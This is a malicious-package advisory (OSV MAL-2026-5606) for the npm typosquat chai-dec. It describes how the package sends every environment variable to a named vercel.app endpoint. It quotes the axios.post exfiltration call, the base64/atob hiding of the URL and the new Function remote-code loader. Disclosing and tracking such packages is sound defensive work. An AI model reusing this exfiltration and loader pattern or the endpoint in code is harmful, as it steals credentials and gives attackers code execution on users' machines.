MAL-2026-5606

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-dec/MAL-2026-5606.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5606

Published

2026-06-11T07:18:08Z

Modified

2026-06-11T08:01:31.203508965Z

Summary

Malicious code in chai-dec (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3)

chai-dec impersonates the chai/pino ecosystem (package name rides on chai; package.json keywords and exports — module.exports.pino = middleware — masquerade as the pino logger). When the exported middleware factory is invoked (the standard Express-style usage), index.js spawns a detached Node child running lib/initializeCaller.js. That script POSTs the entire process.env object to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df via axios.post(apiEndpoint, {...process.env }, { headers: { 'x-secret-header': 'secret' } }), leaking every environment variable on the consumer's machine (AWS/GitHub/npm tokens, DB credentials, CI secrets, etc.). The destination URL is hidden behind a base64 blob in a locally-shadowed process.env.DEV_API_KEY and decoded with atob at runtime to evade static review. The HTTP response body is then passed to new Function('require', response.data) and invoked with the real require, giving the operator of the endpoint arbitrary remote code execution in the consumer process with full Node privileges. This is a typosquat lure carrying a credential-harvest + dynamic-RCE payload.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005693",
            "import_time": "2026-06-11T07:49:41.792565932Z",
            "sha256": "5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T07:18:08Z",
            "versions": [
                "2.3.5"
            ]
        }
    ]
}

References

https://www.npmjs.com/package/chai-dec/v/2.3.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / chai-dec

Package

Name: chai-dec; View open source insights on deps.dev
Purl: pkg:npm/chai-dec

Affected ranges

Affected versions

2.*

2.3.5

Database specific

indicators

{
    "evidence_files": [
        {
            "path": "lib/initializeCaller.js",
            "sha256": "fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad",
            "tlsh": "f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df"
        },
        {
            "path": "package.json",
            "sha256": "cb36fcdc10b8fb077ba9ebf442a53b851683ee6c86f953da370938098eced313",
            "tlsh": "91019760ce789e2300ed25824c2a0643b6618c13a928fc2d32db512d0f9d8bf01bf22e"
        }
    ],
    "package_integrity": [
        {
            "filename": "chai-dec-2.3.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-s5+MofCrzKo3WDjEDqlUyH/KcipEvzT0r3Fu84aHjvtl/qBzTi65LifIvN4efA/9TifLfNUr7MK6YPWcn8GT3Q==",
                "sha1": "787de62f68c405baa2f9ab203d2e59431f51614c"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-dec/MAL-2026-5606.json"

cwes

[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]